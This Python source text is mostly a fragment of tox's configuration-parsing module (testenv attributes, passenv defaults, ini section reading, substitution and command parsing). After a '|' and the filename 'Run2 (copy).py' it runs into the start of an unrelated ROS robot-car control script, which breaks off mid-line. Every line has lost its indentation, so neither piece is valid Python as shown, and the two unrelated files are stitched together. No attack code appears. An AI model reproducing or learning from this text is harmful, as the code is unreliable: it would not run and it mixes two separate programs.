parser.add_testenv_attribute(
name="description",
type="string",
default="",
postprocess=merge_description,
help="short description of this environment",
)
parser.add_testenv_attribute(
name="envtmpdir", type="path", default="{envdir}/tmp", help="venv temporary directory"
)
parser.add_testenv_attribute(
name="envlogdir", type="path", default="{envdir}/log", help="venv log directory"
)
parser.add_testenv_attribute(
name="downloadcache",
type="string",
default=None,
help="(ignored) has no effect anymore, pip-8 uses local caching by default",
)
parser.add_testenv_attribute(
name="changedir",
type="path",
default="{toxinidir}",
help="directory to change to when running commands",
)
parser.add_testenv_attribute_obj(PosargsOption())
parser.add_testenv_attribute(
name="skip_install",
type="bool",
default=False,
help="Do not install the current package. This can be used when you need the virtualenv "
"management but do not want to install the current package",
)
parser.add_testenv_attribute(
name="ignore_errors",
type="bool",
default=False,
help="if set to True all commands will be executed irrespective of their result error "
"status.",
)
def recreate(testenv_config, value):
if testenv_config.config.option.recreate:
return True
return value
parser.add_testenv_attribute(
name="recreate",
type="bool",
default=False,
postprocess=recreate,
help="always recreate this test environment.",
)
def passenv(testenv_config, value):
# Flatten the list to deal with space-separated values.
value = list(itertools.chain.from_iterable([x.split(" ") for x in value]))
passenv = {
"CURL_CA_BUNDLE",
"LANG",
"LANGUAGE",
"LD_LIBRARY_PATH",
"PATH",
"PIP_INDEX_URL",
"REQUESTS_CA_BUNDLE",
"SSL_CERT_FILE",
"TOX_WORK_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"NO_PROXY",
str(REPORTER_TIMESTAMP_ON_ENV),
str(PARALLEL_ENV_VAR_KEY_PUBLIC),
}
# read in global passenv settings
p = os.environ.get("TOX_TESTENV_PASSENV", None)
if p is not None:
env_values = [x for x in p.split() if x]
value.extend(env_values)
# we ensure that tmp directory settings are passed on
# we could also set it to the per-venv "envtmpdir"
# but this leads to very long paths when run with jenkins
# so we just pass it on by default for now.
if tox.INFO.IS_WIN:
passenv.add("SYSTEMDRIVE") # needed for pip6
passenv.add("SYSTEMROOT") # needed for python's crypto module
passenv.add("PATHEXT") # needed for discovering executables
passenv.add("COMSPEC") # needed for distutils cygwincompiler
passenv.add("TEMP")
passenv.add("TMP")
# for `multiprocessing.cpu_count()` on Windows (prior to Python 3.4).
passenv.add("NUMBER_OF_PROCESSORS")
passenv.add("PROCESSOR_ARCHITECTURE") # platform.machine()
passenv.add("USERPROFILE") # needed for `os.path.expanduser()`
passenv.add("MSYSTEM") # fixes #429
else:
passenv.add("TMPDIR")
for spec in value:
for name in os.environ:
if fnmatchcase(name.upper(), spec.upper()):
passenv.add(name)
return passenv
parser.add_testenv_attribute(
name="passenv",
type="line-list",
postprocess=passenv,
help="environment variables needed during executing test commands (taken from invocation "
"environment). Note that tox always passes through some basic environment variables "
"which are needed for basic functioning of the Python system. See --showconfig for the "
"eventual passenv setting.",
)
parser.add_testenv_attribute(
name="whitelist_externals",
type="line-list",
help="each lines specifies a path or basename for which tox will not warn "
"about it coming from outside the test environment.",
)
parser.add_testenv_attribute(
name="platform",
type="string",
default=".*",
help="regular expression which must match against ``sys.platform``. "
"otherwise testenv will be skipped.",
)
def sitepackages(testenv_config, value):
return testenv_config.config.option.sitepackages or value
def alwayscopy(testenv_config, value):
return testenv_config.config.option.alwayscopy or value
parser.add_testenv_attribute(
name="sitepackages",
type="bool",
default=False,
postprocess=sitepackages,
help="Set to ``True`` if you want to create virtual environments that also "
"have access to globally installed packages.",
)
parser.add_testenv_attribute(
"download",
type="bool",
default=False,
help="download the latest pip, setuptools and wheel when creating the virtual"
"environment (default is to use the one bundled in virtualenv)",
)
parser.add_testenv_attribute(
name="alwayscopy",
type="bool",
default=False,
postprocess=alwayscopy,
help="Set to ``True`` if you want virtualenv to always copy files rather "
"than symlinking.",
)
def pip_pre(testenv_config, value):
return testenv_config.config.option.pre or value
parser.add_testenv_attribute(
name="pip_pre",
type="bool",
default=False,
postprocess=pip_pre,
help="If ``True``, adds ``--pre`` to the ``opts`` passed to the install command. ",
)
def develop(testenv_config, value):
option = testenv_config.config.option
return not option.installpkg and (value or option.develop or option.devenv is not None)
parser.add_testenv_attribute(
name="usedevelop",
type="bool",
postprocess=develop,
default=False,
help="install package in develop/editable mode",
)
parser.add_testenv_attribute_obj(InstallcmdOption())
parser.add_testenv_attribute(
name="list_dependencies_command",
type="argv",
default="python -m pip freeze",
help="list dependencies for a virtual environment",
)
parser.add_testenv_attribute_obj(DepOption())
parser.add_testenv_attribute(
name="interrupt_timeout",
type="float",
default=INTERRUPT_TIMEOUT,
help="timeout before sending SIGTERM after SIGINT",
)
parser.add_testenv_attribute(
name="terminate_timeout",
type="float",
default=TERMINATE_TIMEOUT,
help="timeout before sending SIGKILL after SIGTERM",
)
parser.add_testenv_attribute(
name="commands",
type="argvlist",
default="",
help="each line specifies a test command and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_pre",
type="argvlist",
default="",
help="each line specifies a setup command action and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_post",
type="argvlist",
default="",
help="each line specifies a teardown command and can use substitution.",
)
parser.add_testenv_attribute(
"ignore_outcome",
type="bool",
default=False,
help="if set to True a failing result of this testenv will not make "
"tox fail, only a warning will be produced",
)
parser.add_testenv_attribute(
"extras",
type="line-list",
help="list of extras to install with the source distribution or develop install",
)
add_parallel_config(parser)
def cli_skip_missing_interpreter(parser):
class SkipMissingInterpreterAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
value = "true" if values is None else values
if value not in ("config", "true", "false"):
raise argparse.ArgumentTypeError("value must be config, true or false")
setattr(namespace, self.dest, value)
parser.add_argument(
"-s",
"--skip-missing-interpreters",
default="config",
metavar="val",
nargs="?",
action=SkipMissingInterpreterAction,
help="don't fail tests for missing interpreters: {config,true,false} choice",
)
class Config(object):
"""Global Tox config object."""
def __init__(self, pluginmanager, option, interpreters, parser, args):
self.envconfigs = OrderedDict()
"""Mapping envname -> envconfig"""
self.invocationcwd = py.path.local()
self.interpreters = interpreters
self.pluginmanager = pluginmanager
self.option = option
self._parser = parser
self._testenv_attr = parser._testenv_attr
self.args = args
"""option namespace containing all parsed command line options"""
@property
def homedir(self):
homedir = get_homedir()
if homedir is None:
homedir = self.toxinidir # FIXME XXX good idea?
return homedir
class TestenvConfig:
"""Testenv Configuration object.
In addition to some core attributes/properties this config object holds all
per-testenv ini attributes as attributes, see "tox --help-ini" for an overview.
"""
def __init__(self, envname, config, factors, reader):
#: test environment name
self.envname = envname
#: global tox config object
self.config = config
#: set of factors
self.factors = factors
self._reader = reader
self._missing_subs = []
"""Holds substitutions that could not be resolved.
Pre 2.8.1 missing substitutions crashed with a ConfigError although this would not be a
problem if the env is not part of the current testrun. So we need to remember this and
check later when the testenv is actually run and crash only then.
"""
def get_envbindir(self):
"""Path to directory where scripts/binaries reside."""
if tox.INFO.IS_WIN and "jython" not in self.basepython and "pypy" not in self.basepython:
return self.envdir.join("Scripts")
else:
return self.envdir.join("bin")
@property
def envbindir(self):
return self.get_envbindir()
@property
def envpython(self):
"""Path to python executable."""
return self.get_envpython()
def get_envpython(self):
""" path to python/jython executable. """
if "jython" in str(self.basepython):
name = "jython"
else:
name = "python"
return self.envbindir.join(name)
def get_envsitepackagesdir(self):
"""Return sitepackagesdir of the virtualenv environment.
NOTE: Only available during execution, not during parsing.
"""
x = self.config.interpreters.get_sitepackagesdir(info=self.python_info, envdir=self.envdir)
return x
@property
def python_info(self):
"""Return sitepackagesdir of the virtualenv environment."""
return self.config.interpreters.get_info(envconfig=self)
def getsupportedinterpreter(self):
if tox.INFO.IS_WIN and self.basepython and "jython" in self.basepython:
raise tox.exception.UnsupportedInterpreter(
"Jython/Windows does not support installing scripts"
)
info = self.config.interpreters.get_info(envconfig=self)
if not info.executable:
raise tox.exception.InterpreterNotFound(self.basepython)
if not info.version_info:
raise tox.exception.InvocationError(
"Failed to get version_info for {}: {}".format(info.name, info.err)
)
return info.executable
testenvprefix = "testenv:"
def get_homedir():
try:
return py.path.local._gethomedir()
except Exception:
return None
def make_hashseed():
max_seed = 4294967295
if tox.INFO.IS_WIN:
max_seed = 1024
return str(random.randint(1, max_seed))
class ParseIni(object):
def __init__(self, config, ini_path, ini_data): # noqa
config.toxinipath = ini_path
using("tox.ini: {} (pid {})".format(config.toxinipath, os.getpid()))
config.toxinidir = config.toxinipath.dirpath()
self._cfg = py.iniconfig.IniConfig(config.toxinipath, ini_data)
previous_line_of = self._cfg.lineof
def line_of_default_to_zero(section, name=None):
at = previous_line_of(section, name=name)
if at is None:
at = 0
return at
self._cfg.lineof = line_of_default_to_zero
config._cfg = self._cfg
self.config = config
prefix = "tox" if ini_path.basename == "setup.cfg" else None
fallbacksection = "tox:tox" if ini_path.basename == "setup.cfg" else "tox"
context_name = getcontextname()
if context_name == "jenkins":
reader = SectionReader(
"tox:jenkins", self._cfg, prefix=prefix, fallbacksections=[fallbacksection]
)
dist_share_default = "{toxworkdir}/distshare"
elif not context_name:
reader = SectionReader("tox", self._cfg, prefix=prefix)
dist_share_default = "{homedir}/.tox/distshare"
else:
raise ValueError("invalid context")
if config.option.hashseed is None:
hash_seed = make_hashseed()
elif config.option.hashseed == "noset":
hash_seed = None
else:
hash_seed = config.option.hashseed
config.hashseed = hash_seed
reader.addsubstitutions(toxinidir=config.toxinidir, homedir=config.homedir)
if config.option.workdir is None:
config.toxworkdir = reader.getpath("toxworkdir", "{toxinidir}/.tox")
else:
config.toxworkdir = config.toxinidir.join(config.option.workdir, abs=True)
if os.path.exists(str(config.toxworkdir)):
config.toxworkdir = config.toxworkdir.realpath()
reader.addsubstitutions(toxworkdir=config.toxworkdir)
config.ignore_basepython_conflict = reader.getbool("ignore_basepython_conflict", False)
config.distdir = reader.getpath("distdir", "{toxworkdir}/dist")
reader.addsubstitutions(distdir=config.distdir)
config.distshare = reader.getpath("distshare", dist_share_default)
config.temp_dir = reader.getpath("temp_dir", "{toxworkdir}/.tmp")
reader.addsubstitutions(distshare=config.distshare)
config.sdistsrc = reader.getpath("sdistsrc", None)
config.setupdir = reader.getpath("setupdir", "{toxinidir}")
config.logdir = config.toxworkdir.join("log")
within_parallel = PARALLEL_ENV_VAR_KEY_PRIVATE in os.environ
if not within_parallel and not WITHIN_PROVISION:
ensure_empty_dir(config.logdir)
# determine indexserver dictionary
config.indexserver = {"default": IndexServerConfig("default")}
prefix = "indexserver"
for line in reader.getlist(prefix):
name, url = map(lambda x: x.strip(), line.split("=", 1))
config.indexserver[name] = IndexServerConfig(name, url)
if config.option.skip_missing_interpreters == "config":
val = reader.getbool("skip_missing_interpreters", False)
config.option.skip_missing_interpreters = "true" if val else "false"
override = False
if config.option.indexurl:
for url_def in config.option.indexurl:
m = re.match(r"\W*(\w+)=(\S+)", url_def)
if m is None:
url = url_def
name = "default"
else:
name, url = m.groups()
if not url:
url = None
if name != "ALL":
config.indexserver[name].url = url
else:
override = url
# let ALL override all existing entries
if override:
for name in config.indexserver:
config.indexserver[name] = IndexServerConfig(name, override)
self.handle_provision(config, reader)
self.parse_build_isolation(config, reader)
res = self._getenvdata(reader, config)
config.envlist, all_envs, config.envlist_default, config.envlist_explicit = res
# factors used in config or predefined
known_factors = self._list_section_factors("testenv")
known_factors.update({"py", "python"})
# factors stated in config envlist
stated_envlist = reader.getstring("envlist", replace=False)
if stated_envlist:
for env in _split_env(stated_envlist):
known_factors.update(env.split("-"))
# configure testenvs
to_do = []
failures = OrderedDict()
results = {}
cur_self = self
def run(name, section, subs, config):
try:
results[name] = cur_self.make_envconfig(name, section, subs, config)
except Exception as exception:
failures[name] = (exception, traceback.format_exc())
order = []
for name in all_envs:
section = "{}{}".format(testenvprefix, name)
factors = set(name.split("-"))
if (
section in self._cfg
or factors <= known_factors
or all(
tox.PYTHON.PY_FACTORS_RE.match(factor) for factor in factors - known_factors
)
):
order.append(name)
thread = Thread(target=run, args=(name, section, reader._subs, config))
thread.daemon = True
thread.start()
to_do.append(thread)
for thread in to_do:
while thread.is_alive():
thread.join(timeout=20)
if failures:
raise tox.exception.ConfigError(
"\n".join(
"{} failed with {} at {}".format(key, exc, trace)
for key, (exc, trace) in failures.items()
)
)
for name in order:
config.envconfigs[name] = results[name]
all_develop = all(
name in config.envconfigs and config.envconfigs[name].usedevelop
for name in config.envlist
)
config.skipsdist = reader.getbool("skipsdist", all_develop)
if config.option.devenv is not None:
config.option.notest = True
if config.option.devenv is not None and len(config.envlist) != 1:
feedback("--devenv requires only a single -e", sysexit=True)
def handle_provision(self, config, reader):
requires_list = reader.getlist("requires")
config.minversion = reader.getstring("minversion", None)
config.provision_tox_env = name = reader.getstring("provision_tox_env", ".tox")
min_version = "tox >= {}".format(config.minversion or tox.__version__)
deps = self.ensure_requires_satisfied(config, requires_list, min_version)
if config.run_provision:
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["description"] = "meta tox"
env_config = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config
)
env_config.deps = deps
config.envconfigs[config.provision_tox_env] = env_config
raise tox.exception.MissingRequirement(config)
# if provisioning is not on, now we need do a strict argument evaluation
# raise on unknown args
self.config._parser.parse_cli(args=self.config.args, strict=True)
@staticmethod
def ensure_requires_satisfied(config, requires, min_version):
missing_requirements = []
failed_to_parse = False
deps = []
exists = set()
for require in requires + [min_version]:
# noinspection PyBroadException
try:
package = requirements.Requirement(require)
# check if the package even applies
if package.marker and not package.marker.evaluate({"extra": ""}):
continue
package_name = canonicalize_name(package.name)
if package_name not in exists:
deps.append(DepConfig(require, None))
exists.add(package_name)
dist = importlib_metadata.distribution(package.name)
if not package.specifier.contains(dist.version, prereleases=True):
raise MissingDependency(package)
except requirements.InvalidRequirement as exception:
failed_to_parse = True
error("failed to parse {!r}".format(exception))
except Exception as exception:
verbosity1("could not satisfy requires {!r}".format(exception))
missing_requirements.append(str(requirements.Requirement(require)))
if failed_to_parse:
raise tox.exception.BadRequirement()
if WITHIN_PROVISION and missing_requirements:
msg = "break infinite loop provisioning within {} missing {}"
raise tox.exception.Error(msg.format(sys.executable, missing_requirements))
config.run_provision = bool(len(missing_requirements))
return deps
def parse_build_isolation(self, config, reader):
config.isolated_build = reader.getbool("isolated_build", False)
config.isolated_build_env = reader.getstring("isolated_build_env", ".package")
if config.isolated_build is True:
name = config.isolated_build_env
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["deps"] = ""
self._cfg.sections[section_name]["sitepackages"] = "False"
self._cfg.sections[section_name]["description"] = "isolated packaging environment"
config.envconfigs[name] = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config
)
def _list_section_factors(self, section):
factors = set()
if section in self._cfg:
for _, value in self._cfg[section].items():
exprs = re.findall(r"^([\w{}\.!,-]+)\:\s+", value, re.M)
factors.update(*mapcat(_split_factor_expr_all, exprs))
return factors
def make_envconfig(self, name, section, subs, config, replace=True):
factors = set(name.split("-"))
reader = SectionReader(section, self._cfg, fallbacksections=["testenv"], factors=factors)
tc = TestenvConfig(name, config, factors, reader)
reader.addsubstitutions(
envname=name,
envbindir=tc.get_envbindir,
envsitepackagesdir=tc.get_envsitepackagesdir,
envpython=tc.get_envpython,
**subs
)
for env_attr in config._testenv_attr:
atype = env_attr.type
try:
if atype in (
"bool",
"float",
"path",
"string",
"dict",
"dict_setenv",
"argv",
"argvlist",
):
meth = getattr(reader, "get{}".format(atype))
res = meth(env_attr.name, env_attr.default, replace=replace)
elif atype == "basepython":
no_fallback = name in (config.provision_tox_env,)
res = reader.getstring(
env_attr.name, env_attr.default, replace=replace, no_fallback=no_fallback
)
elif atype == "space-separated-list":
res = reader.getlist(env_attr.name, sep=" ")
elif atype == "line-list":
res = reader.getlist(env_attr.name, sep="\n")
elif atype == "env-list":
res = reader.getstring(env_attr.name, replace=False)
res = tuple(_split_env(res))
else:
raise ValueError("unknown type {!r}".format(atype))
if env_attr.postprocess:
res = env_attr.postprocess(testenv_config=tc, value=res)
except tox.exception.MissingSubstitution as e:
tc._missing_subs.append(e.name)
res = e.FLAG
setattr(tc, env_attr.name, res)
if atype in ("path", "string", "basepython"):
reader.addsubstitutions(**{env_attr.name: res})
return tc
def _getallenvs(self, reader, extra_env_list=None):
extra_env_list = extra_env_list or []
env_str = reader.getstring("envlist", replace=False)
env_list = _split_env(env_str)
for env in extra_env_list:
if env not in env_list:
env_list.append(env)
all_envs = OrderedDict((i, None) for i in env_list)
for section in self._cfg:
if section.name.startswith(testenvprefix):
all_envs[section.name[len(testenvprefix) :]] = None
if not all_envs:
all_envs["python"] = None
return list(all_envs.keys())
def _getenvdata(self, reader, config):
from_option = self.config.option.env
from_environ = os.environ.get("TOXENV")
from_config = reader.getstring("envlist", replace=False)
env_list = []
envlist_explicit = False
if (from_option and "ALL" in from_option) or (
not from_option and from_environ and "ALL" in from_environ.split(",")
):
all_envs = self._getallenvs(reader)
else:
candidates = (
(os.environ.get(PARALLEL_ENV_VAR_KEY_PRIVATE), True),
(from_option, True),
(from_environ, True),
("py" if self.config.option.devenv is not None else None, False),
(from_config, False),
)
env_str, envlist_explicit = next(((i, e) for i, e in candidates if i), ([], False))
env_list = _split_env(env_str)
all_envs = self._getallenvs(reader, env_list)
if not env_list:
env_list = all_envs
package_env = config.isolated_build_env
if config.isolated_build is True and package_env in all_envs:
all_envs.remove(package_env)
if config.isolated_build is True and package_env in env_list:
msg = "isolated_build_env {} cannot be part of envlist".format(package_env)
raise tox.exception.ConfigError(msg)
return env_list, all_envs, _split_env(from_config), envlist_explicit
def _split_env(env):
"""if handed a list, action="append" was used for -e """
if env is None:
return []
if not isinstance(env, list):
env = [e.split("#", 1)[0].strip() for e in env.split("\n")]
env = ",".join([e for e in env if e])
env = [env]
return mapcat(_expand_envstr, env)
def _is_negated_factor(factor):
return factor.startswith("!")
def _base_factor_name(factor):
return factor[1:] if _is_negated_factor(factor) else factor
def _split_factor_expr(expr):
def split_single(e):
raw = e.split("-")
included = {_base_factor_name(factor) for factor in raw if not _is_negated_factor(factor)}
excluded = {_base_factor_name(factor) for factor in raw if _is_negated_factor(factor)}
return included, excluded
partial_envs = _expand_envstr(expr)
return [split_single(e) for e in partial_envs]
def _split_factor_expr_all(expr):
partial_envs = _expand_envstr(expr)
return [{_base_factor_name(factor) for factor in e.split("-")} for e in partial_envs]
def _expand_envstr(envstr):
# split by commas not in groups
tokens = re.split(r"((?:\{[^}]+\})+)|,", envstr)
envlist = ["".join(g).strip() for k, g in itertools.groupby(tokens, key=bool) if k]
def expand(env):
tokens = re.split(r"\{([^}]+)\}", env)
parts = [re.sub(r"\s+", "", token).split(",") for token in tokens]
return ["".join(variant) for variant in itertools.product(*parts)]
return mapcat(expand, envlist)
def mapcat(f, seq):
return list(itertools.chain.from_iterable(map(f, seq)))
class DepConfig:
def __init__(self, name, indexserver=None):
self.name = name
self.indexserver = indexserver
def __repr__(self):
if self.indexserver:
if self.indexserver.name == "default":
return self.name
return ":{}:{}".format(self.indexserver.name, self.name)
return str(self.name)
class IndexServerConfig:
def __init__(self, name, url=None):
self.name = name
self.url = url
def __repr__(self):
return "IndexServerConfig(name={}, url={})".format(self.name, self.url)
is_section_substitution = re.compile(r"{\[[^{}\s]+\]\S+?}").match
"""Check value matches substitution form of referencing value from other section.
E.g. {[base]commands}
"""
class SectionReader:
def __init__(self, section_name, cfgparser, fallbacksections=None, factors=(), prefix=None):
if prefix is None:
self.section_name = section_name
else:
self.section_name = "{}:{}".format(prefix, section_name)
self._cfg = cfgparser
self.fallbacksections = fallbacksections or []
self.factors = factors
self._subs = {}
self._subststack = []
self._setenv = None
def get_environ_value(self, name):
if self._setenv is None:
return os.environ.get(name)
return self._setenv.get(name)
def addsubstitutions(self, _posargs=None, **kw):
self._subs.update(kw)
if _posargs:
self.posargs = _posargs
def getpath(self, name, defaultpath, replace=True):
path = self.getstring(name, defaultpath, replace=replace)
if path is not None:
toxinidir = self._subs["toxinidir"]
return toxinidir.join(path, abs=True)
def getlist(self, name, sep="\n"):
s = self.getstring(name, None)
if s is None:
return []
return [x.strip() for x in s.split(sep) if x.strip()]
def getdict(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace)
return self._getdict(value, default=default, sep=sep, replace=replace)
def getdict_setenv(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace, crossonly=True)
definitions = self._getdict(value, default=default, sep=sep, replace=replace)
self._setenv = SetenvDict(definitions, reader=self)
return self._setenv
def _getdict(self, value, default, sep, replace=True):
if value is None or not replace:
return default or {}
d = {}
for line in value.split(sep):
if line.strip():
name, rest = line.split("=", 1)
d[name.strip()] = rest.strip()
return d
def getfloat(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, float):
try:
s = float(s)
except ValueError:
raise tox.exception.ConfigError("{}: invalid float {!r}".format(name, s))
return s
def getbool(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, bool):
if s.lower() == "true":
s = True
elif s.lower() == "false":
s = False
else:
raise tox.exception.ConfigError(
"{}: boolean value {!r} needs to be 'True' or 'False'".format(name, s)
)
return s
def getargvlist(self, name, default="", replace=True):
s = self.getstring(name, default, replace=False)
return _ArgvlistReader.getargvlist(self, s, replace=replace)
def getargv(self, name, default="", replace=True):
return self.getargvlist(name, default, replace=replace)[0]
def getstring(self, name, default=None, replace=True, crossonly=False, no_fallback=False):
x = None
sections = [self.section_name] + ([] if no_fallback else self.fallbacksections)
for s in sections:
try:
x = self._cfg[s][name]
break
except KeyError:
continue
if x is None:
x = default
else:
# It is needed to apply factors before unwrapping
# dependencies, otherwise it can break the substitution
# process. Once they are unwrapped, we call apply factors
# again for those new dependencies.
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
return x
def _replace_if_needed(self, x, name, replace, crossonly):
if replace and x and hasattr(x, "replace"):
x = self._replace(x, name=name, crossonly=crossonly)
return x
def _apply_factors(self, s):
def factor_line(line):
m = re.search(r"^([\w{}\.!,-]+)\:\s+(.+)", line)
if not m:
return line
expr, line = m.groups()
if any(
included <= self.factors and not any(x in self.factors for x in excluded)
for included, excluded in _split_factor_expr(expr)
):
return line
lines = s.strip().splitlines()
return "\n".join(filter(None, map(factor_line, lines)))
def _replace(self, value, name=None, section_name=None, crossonly=False):
if "{" not in value:
return value
section_name = section_name if section_name else self.section_name
self._subststack.append((section_name, name))
try:
replaced = Replacer(self, crossonly=crossonly).do_replace(value)
assert self._subststack.pop() == (section_name, name)
except tox.exception.MissingSubstitution:
if not section_name.startswith(testenvprefix):
raise tox.exception.ConfigError(
"substitution env:{!r}: unknown or recursive definition in"
" section {!r}.".format(value, section_name)
)
raise
return replaced
class Replacer:
RE_ITEM_REF = re.compile(
r"""
(?<!\\)[{]
(?:(?P<sub_type>[^[:{}]+):)? # optional sub_type for special rules
(?P<substitution_value>(?:\[[^,{}]*\])?[^:,{}]*) # substitution key
(?::(?P<default_value>[^{}]*))? # default value
[}]
""",
re.VERBOSE,
)
def __init__(self, reader, crossonly=False):
self.reader = reader
self.crossonly = crossonly
def do_replace(self, value):
"""
Recursively expand substitutions starting from the innermost expression
"""
def substitute_once(x):
return self.RE_ITEM_REF.sub(self._replace_match, x)
expanded = substitute_once(value)
while expanded != value: # substitution found
value = expanded
expanded = substitute_once(value)
return expanded
def _replace_match(self, match):
g = match.groupdict()
sub_value = g["substitution_value"]
if self.crossonly:
if sub_value.startswith("["):
return self._substitute_from_other_section(sub_value)
# in crossonly we return all other hits verbatim
start, end = match.span()
return match.string[start:end]
# special case: all empty values means ":" which is os.pathsep
if not any(g.values()):
return os.pathsep
# special case: opts and packages. Leave {opts} and
# {packages} intact, they are replaced manually in
# _venv.VirtualEnv.run_install_command.
if sub_value in ("opts", "packages"):
return "{{{}}}".format(sub_value)
try:
sub_type = g["sub_type"]
except KeyError:
raise tox.exception.ConfigError(
"Malformed substitution; no substitution type provided"
)
if sub_type == "env":
return self._replace_env(match)
if sub_type == "tty":
if is_interactive():
return match.group("substitution_value")
return match.group("default_value")
if sub_type is not None:
raise tox.exception.ConfigError(
"No support for the {} substitution type".format(sub_type)
)
return self._replace_substitution(match)
def _replace_env(self, match):
key = match.group("substitution_value")
if not key:
raise tox.exception.ConfigError("env: requires an environment variable name")
default = match.group("default_value")
value = self.reader.get_environ_value(key)
if value is not None:
return value
if default is not None:
return default
raise tox.exception.MissingSubstitution(key)
def _substitute_from_other_section(self, key):
if key.startswith("[") and "]" in key:
i = key.find("]")
section, item = key[1:i], key[i + 1 :]
cfg = self.reader._cfg
if section in cfg and item in cfg[section]:
if (section, item) in self.reader._subststack:
raise ValueError(
"{} already in {}".format((section, item), self.reader._subststack)
)
x = str(cfg[section][item])
return self.reader._replace(
x, name=item, section_name=section, crossonly=self.crossonly
)
raise tox.exception.ConfigError("substitution key {!r} not found".format(key))
def _replace_substitution(self, match):
sub_key = match.group("substitution_value")
val = self.reader._subs.get(sub_key, None)
if val is None:
val = self._substitute_from_other_section(sub_key)
if callable(val):
val = val()
return str(val)
def is_interactive():
return sys.stdin.isatty()
class _ArgvlistReader:
@classmethod
def getargvlist(cls, reader, value, replace=True):
"""Parse ``commands`` argvlist multiline string.
:param SectionReader reader: reader to be used.
:param str value: Content stored by key.
:rtype: list[list[str]]
:raise :class:`tox.exception.ConfigError`:
line-continuation ends nowhere while resolving for specified section
"""
commands = []
current_command = ""
for line in value.splitlines():
line = line.rstrip()
if not line:
continue
if line.endswith("\\"):
current_command += " {}".format(line[:-1])
continue
current_command += line
if is_section_substitution(current_command):
replaced = reader._replace(current_command, crossonly=True)
commands.extend(cls.getargvlist(reader, replaced))
else:
commands.append(cls.processcommand(reader, current_command, replace))
current_command = ""
else:
if current_command:
raise tox.exception.ConfigError(
"line-continuation ends nowhere while resolving for [{}] {}".format(
reader.section_name, "commands"
)
)
return commands
@classmethod
def processcommand(cls, reader, command, replace=True):
posargs = getattr(reader, "posargs", "")
if sys.platform.startswith("win"):
posargs_string = list2cmdline([x for x in posargs if x])
else:
posargs_string = " ".join([shlex_quote(x) for x in posargs if x])
# Iterate through each word of the command substituting as
# appropriate to construct the new command string. This
# string is then broken up into exec argv components using
# shlex.
if replace:
newcommand = ""
for word in CommandParser(command).words():
if word == "{posargs}" or word == "[]":
newcommand += posargs_string
continue
elif word.startswith("{posargs:") and word.endswith("}"):
if posargs:
newcommand += posargs_string
continue
else:
word = word[9:-1]
new_arg = ""
new_word = reader._replace(word)
new_word = reader._replace(new_word)
new_word = new_word.replace("\\{", "{").replace("\\}", "}")
new_arg += new_word
newcommand += new_arg
else:
newcommand = command
# Construct shlex object that will not escape any values,
# use all values as is in argv.
shlexer = shlex.shlex(newcommand, posix=True)
shlexer.whitespace_split = True
shlexer.escape = ""
return list(shlexer)
class CommandParser(object):
class State(object):
def __init__(self):
self.word = ""
self.depth = 0
self.yield_words = []
def __init__(self, command):
self.command = command
def words(self):
ps = CommandParser.State()
def word_has_ended():
return (
(
cur_char in string.whitespace
and ps.word
and ps.word[-1] not in string.whitespace
)
or (cur_char == "{" and ps.depth == 0 and not ps.word.endswith("\\"))
or (ps.depth == 0 and ps.word and ps.word[-1] == "}")
or (cur_char not in string.whitespace and ps.word and ps.word.strip() == "")
)
def yield_this_word():
yieldword = ps.word
ps.word = ""
if yieldword:
ps.yield_words.append(yieldword)
def yield_if_word_ended():
if word_has_ended():
yield_this_word()
def accumulate():
ps.word += cur_char
def push_substitution():
ps.depth += 1
def pop_substitution():
ps.depth -= 1
for cur_char in self.command:
if cur_char in string.whitespace:
if ps.depth == 0:
yield_if_word_ended()
accumulate()
elif cur_char == "{":
yield_if_word_ended()
accumulate()
push_substitution()
elif cur_char == "}":
accumulate()
pop_substitution()
else:
yield_if_word_ended()
accumulate()
if ps.word.strip():
yield_this_word()
return ps.yield_words
def getcontextname():
if any(env in os.environ for env in ["JENKINS_URL", "HUDSON_URL"]):
return "jenkins"
return None
|
Run2 (copy).py
|
#!/usr/bin/env python
# license removed for brevity
import rospy
import cv2
import numpy as np
import time
import threading
from std_msgs.msg import String, Float32, Bool
from sensor_msgs.msg import CompressedImage
import sys
from modules.Control import PID, Fuzzy
from modules.Advance import Advance_lane, Speed_prediction
from modules.Route2 import navigator
from modules.PyCallCpp import get_shortest_route
from modules.Classic import Classic, Pre
from modules.Camera import get_rgb, get_depth
import config as cf
import rospkg
rospack = rospkg.RosPack()
path = rospack.get_path('r4f')
rospy.init_node('run', anonymous=True, disable_signals=True)
cf.pos_cam_pub = rospy.Publisher('/set_pos_camera_api', Float32, queue_size=1)
def set_led(led_stt):
led_pub = rospy.Publisher('/led_status', Bool, queue_size=1)
led_pub.publish(led_stt)
def reset_mpu():
reset_mpu = rospy.Publisher("/mpu_9250_node/reset", Float32, queue_size=1)
reset_mpu.publish(1.0)
def set_speed(speed):
if cf.pause or cf.pause2:
speed = 0
if cf.barrier is not None and speed >10:
speed -=5
if speed > 30:
speed = 30
if speed < -30:
speed = -30
speed_pub = rospy.Publisher('/set_speed_car_api', Float32, queue_size=1)
speed_pub.publish(speed)
def set_steer(steer):
steer_pub = rospy.Publisher('/set_steer_car_api', Float32, queue_size=1)
steer_pub.publish(steer)
def set_lcd(text):
lcd_pub = rospy.Publisher('/lcd_print', String, queue_size=1)
lcd_pub.publish(text)
def print_lcd(line):
texts = ["00:0:Speed=", "00:1:Max=", "00:2:Mode=", "00:3:Rec=", "10:0:Angle="]
